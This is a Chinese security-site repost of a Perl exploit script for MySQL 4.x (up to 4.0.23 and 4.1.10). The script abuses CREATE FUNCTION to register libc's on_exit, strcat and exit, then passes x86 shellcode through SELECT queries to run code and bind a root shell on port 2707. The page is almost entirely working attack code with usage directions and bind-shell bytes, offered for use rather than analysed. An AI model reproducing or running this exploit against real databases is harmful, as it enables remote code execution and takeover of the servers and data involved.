您现在的位置: | Mysql 4.x CREATE FUNCTION libc Arbitrary Code Execution Exploit | 热 |
| Mysql 4.x CREATE FUNCTION libc Arbitrary Code Execution Exploit | ||
| 作者:YesHack.… 文章来源:YesHack.Com 更新时间:2006-4-18 8:29:55 【字体:小 大】 | ||
#!/usr/bin/perl ## Mysql CREATE FUNCTION libc arbitrary code execution. ## ## Author: Stefano Di Paola ## Vulnerable: Mysql <= 4.0.23, 4.1.10 ## Type of Vulnerability: Local/Remote - input validation ## Tested On : Mandrake 10.1 /Debian Sarge ## Vendor Status: Notified on March 2005 ## ## Copyright 2005 Stefano Di Paola ([email]stefano.dipaola@wisec.it[/email]) ## ## ## Disclaimer: ## In no event shall the author be liable for any damages ## whatsoever arising out of or in connection with the use ## or spread of this information. ## Any use of this information is at the user’s own risk. ## ## ## ## It calls on_exit(address) ## then overwrites the address with strcat or strcpy ## and then calls exit ## ## Usage: ## perl myexp.pl numberofnops offset ## Example: ## perl myexp.pl 3 0 ################################################ use strict; use DBI(); use Data::Dumper; use constant DEBUG => 0; use constant PASS => "USEYOURPASSHERE"; # Connect to the database. my $dbh = DBI->connect("DBI:mysql:database=test;host=localhost", "root", PASS ,{’RaiseError’ => 1}); ### This is the opcode pointed by the address where on_exit jumps ### ### ### 0x3deb jmp 0x3d ### but needs to be decremented by 2. ("shell",0x0x3de9,0) ## -1 -1 = 0x3de9-2 # resulting in 0x3deb ## 0x3d is the distance from the address on_exit calls and the beginning of ## bind shell "\x6a\x66\x58\x6a\x01.... my $jmp=0x3de9+($ARGV[1]<<8); printf("Using %x\n",$jmp); my $zeros="0,"x($jmp); ### Bind_shell... works.....but maybe needs some nop \x90 ### so i use argv[0] to repeat \x90 ### It binds a shell to port 2707 (\x0a\x93) my $shell= ("\x90"x$ARGV[0])."\x6a\x66\x58\x6a\x01". "\x5b\x99\x52\x53\x6a\x02\x89". "\xe1\xcd\x80\x52\x43\x68\xff\x02\x0a\x93\x89\xe1". "\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80". "\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0". "\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80". "\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f". "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; ########### Bash !!!!!!!!!!!############### # my $shell=("\x90"x$ARGV[0])."\x6a\x0b\x58\x99\x52\x68". # "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80"; my $onex_create="create function on_exit returns integer soname ’libc.so.6’;"; print $onex_create,"\n" if(DEBUG); my $sth = $dbh->prepare($onex_create); if (!$sth) { print "Error:" . $dbh->errstr . "\n"; } eval {$sth->execute}; if($@){ print "Error:" . $sth->errstr . "\n"; } my $strcat_create="create function strcat returns string soname ’libc.so.6’;"; print $strcat_create,"\n" if(DEBUG); my $sth = $dbh->prepare($strcat_create); if (!$sth) { print "Error:" . $dbh->errstr . "\n"; } eval {$sth->execute}; if($@){ print "Error:" . $sth->errstr . "\n"; } my $exit_create="create function exit returns integer soname ’libc.so.6’;"; print $exit_create,"\n" if(DEBUG); my $sth = $dbh->prepare($exit_create); if (!$sth) { print "Error:" . $dbh->errstr . "\n"; } eval {$sth->execute}; if($@){ print "Error:" . $sth->errstr . "\n"; } my $onex="select on_exit(’".$shell."’,".$zeros."0), strcat(0);"; print "select on_exit(’".$shell."’, 0), strcat(0);"; print $onex,"\n" if(DEBUG); my $sth = $dbh->prepare($onex); if (!$sth) { print "Error:" . $dbh->errstr . "\n"; } print "Select on_exit\n"; if (!$sth->execute) { print "Error:" . $sth->errstr . "\n"; } while (my $ref = $sth->fetchrow_hashref()) { print Dumper($ref); } my $strc="select strcat(’".$shell."’,".$zeros."0), exit(0);"; print $strc,"\n" if(DEBUG); $sth = $dbh->prepare($strc); if (!$sth) { print "Error:" . $dbh->errstr . "\n"; } if (!$sth->execute) { print "Error:" . $sth->errstr . "\n"; } print "Select exit\n"; |
||
|
||
| 文章录入:YesHack.Com 责任编辑:YesHack.Com | ||
